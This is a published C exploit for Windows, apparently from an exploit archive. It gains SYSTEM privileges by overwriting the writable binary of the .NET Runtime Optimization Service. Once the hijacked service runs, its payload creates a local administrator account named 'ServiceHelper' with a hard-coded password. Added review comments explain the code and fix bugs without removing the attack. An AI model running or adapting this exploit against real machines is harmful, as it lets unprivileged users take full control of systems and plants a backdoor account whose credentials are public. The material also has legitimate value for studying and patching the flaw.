.NET Runtime Optimization Service Privilege Escalation Exploit 0day 2011-03-08 10:15:09

/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <[email protected]>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a

_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/

xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

This one's a no-brainer, plain simple:

This service's EXE file can be overwritten by any non-admin domain user
and local Power Users (which are the default permissions set).
This exploit compiles to a service that uses the original service's id.

Tested on Windows 2003, WinXP (sp3) and Win7
( my guess is that it runs on any win box running this service ).

greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!

bless y'all!

*/
#include <stdio.h>
#include <windows.h>

/* Status record reported to the SCM via SetServiceStatus().  Any field that
 * is not assigned explicitly before the first report keeps the zero value
 * it gets from static initialisation. */
SERVICE_STATUS ServiceStatus;
/* Handle that RegisterServiceCtrlHandler() returns for this service;
 * SetServiceStatus() fails while it is still NULL. */
SERVICE_STATUS_HANDLE hStatus;

/* Absolute path of the service binary that gets replaced.  Hard-coded to the
 * 32-bit v2.0.50727 framework directory under C:\WINDOWS, so it only matches
 * an installation with that system root and, per the _X86/_32 suffixes in the
 * names below, only the x86 flavour of the service. */
#define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
/* File name alone; not referenced anywhere in this file. */
#define PWN_SHORT "mscorsvw.exe"
/* Display name, passed to `net start` in main(). */
#define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
/* Service key name, used as lpServiceName in main()'s service table. */
#define PWN_ID "clr_optimization_v2.0.50727_32"

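/*
 * Control handler registered for the hijacked service.  STOP and SHUTDOWN
 * are acknowledged by reporting SERVICE_STOPPED; any other request just
 * re-reports the current state.  A separate static helper is used (rather
 * than the file's never-defined ControlHandler prototype) so it can carry
 * the __stdcall signature LPHANDLER_FUNCTION requires.
 */
static void WINAPI service_control(DWORD request)
{
    switch (request) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        break;
    default:
        break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
}

/* Payload; defined at the bottom of the file.  Declared here so the call
 * below is not an implicit declaration. */
int InitService(void);

/*
 * Service entry point invoked by the SCM once the overwritten mscorsvw.exe is
 * started (i.e. running as LocalSystem).  Runs the payload in InitService()
 * and reports RUNNING on success or STOPPED with an error code on failure.
 *
 * Declared WINAPI so it really matches LPSERVICE_MAIN_FUNCTION: the cast in
 * main() hides the mismatch, but on 32-bit builds a __cdecl function
 * returning into the dispatcher's __stdcall call site leaves the stack
 * unbalanced.  argc/argv from the SCM are not used.
 */
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
    (void)argc;
    (void)argv;

    /* Without a registered handler hStatus stays NULL, every
     * SetServiceStatus() call fails, and the SCM kills the process once its
     * start timeout expires. */
    hStatus = RegisterServiceCtrlHandler(PWN_ID, service_control);
    if (hStatus == NULL) {
        return;
    }

    memset(&ServiceStatus, 0, sizeof ServiceStatus);
    ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    SetServiceStatus(hStatus, &ServiceStatus);

    /* Non-zero means the payload's command line failed. */
    int rc = InitService();
    if (rc != 0) {
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR;
        ServiceStatus.dwServiceSpecificExitCode = (DWORD)rc;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    }

    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);
}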

/* Declared but never defined in this file, and nothing references it. */
void ControlHandler(DWORD request);
/* Payload, defined at the bottom of the file.  Note that this prototype
 * comes after ServiceMain, the function that calls it. */
int InitService();

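/*
 * Move PWN_EXE aside as PWN_EXE.bak and copy `self` (this program's own image)
 * into its place.  Returns 0 on success, -1 on failure.  If the copy fails
 * after the rename succeeded, the original is moved back so the service is
 * not left without a binary.
 */
static int replace_service_binary(const char *self)
{
    char backup[MAX_PATH + 8];
    int n = snprintf(backup, sizeof backup, "%s.bak", PWN_EXE);
    if (n < 0 || (size_t)n >= sizeof backup) {
        return -1;
    }

    /* rename() fails when we lack write access to the directory -- the
     * "not vulnerable" case -- or when a stale .bak from an earlier run is
     * still present. */
    if (rename(PWN_EXE, backup) != 0) {
        fprintf(stderr, " :( sorry, can't write to file.\n");
        return -1;
    }

    /* bFailIfExists = TRUE: the rename just removed PWN_EXE, so a file being
     * there now means something else re-created it; do not clobber it. */
    if (!CopyFile(self, PWN_EXE, TRUE)) {
        fprintf(stderr, " :( copy failed (error %lu), restoring original.\n",
                (unsigned long)GetLastError());
        rename(backup, PWN_EXE);
        return -1;
    }
    return 0;
}

/*
 * Entry point with two roles, chosen by the account we run under:
 *
 *  - as an ordinary user: replace the service binary with ourselves and start
 *    the service, so the SCM re-launches this program as LocalSystem;
 *  - as SYSTEM (launched by the SCM): hand over to the service dispatcher,
 *    which calls ServiceMain and thereby the payload.
 *
 * Returns 0 on success, 1 when the service binary could not be replaced.
 *
 * NOTE(review): the original mscorsvw.exe is left as PWN_EXE.bak and never
 * restored, so the optimization service stays broken until someone puts it
 * back.  The payload also creates a local administrator with the password
 * printed below; since these credentials ship with this file, the account is
 * a backdoor usable by anyone who has read it.
 */
int main(int argc, char **argv)
{
    char user[100] = "";
    DWORD user_len = sizeof user;

    /* Check the result: the original compared an uninitialised buffer when
     * the lookup failed.  An empty name takes the installer branch. */
    if (!GetUserName(user, &user_len)) {
        user[0] = '\0';
    }

    if (strcmp(user, "SYSTEM") != 0) {
        if (argc < 1 || argv[0] == NULL) {
            fprintf(stderr, " :( sorry, can't write to file.\n");
            return 1;
        }
        if (replace_service_binary(argv[0]) != 0) {
            return 1;
        }
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        /* PWN_NAME is a compile-time constant, so there is no injection
         * surface in this command line; its exit status is ignored as in the
         * original. */
        system("net start \"" PWN_NAME "\" 2> NUL > NUL");
    }

    /* Reached both by the installer (where the dispatcher call simply fails,
     * since we were not started by the SCM) and by the SYSTEM instance. */
    SERVICE_TABLE_ENTRY table[2];
    table[0].lpServiceName = PWN_ID;
    table[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
    table[1].lpServiceName = NULL;
    table[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcher(table);

    return 0;
}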

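/*
 * Payload, run from ServiceMain once the SCM has started the hijacked service
 * (i.e. as LocalSystem): creates the local user ServiceHelper with password
 * ILov3Coff33! and adds it to Administrators.
 *
 * Returns the exit status of the command line (0 on success) so ServiceMain
 * can report failure.  The original had no return statement at all, so its
 * caller tested an indeterminate value.
 *
 * NOTE(review): the credentials are hard-coded and published with this file;
 * `&` (rather than `&&`) runs the group add even if account creation failed,
 * and net.exe's output is not captured, so this status code is the only
 * failure signal.
 */
int InitService(void)
{
    return system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}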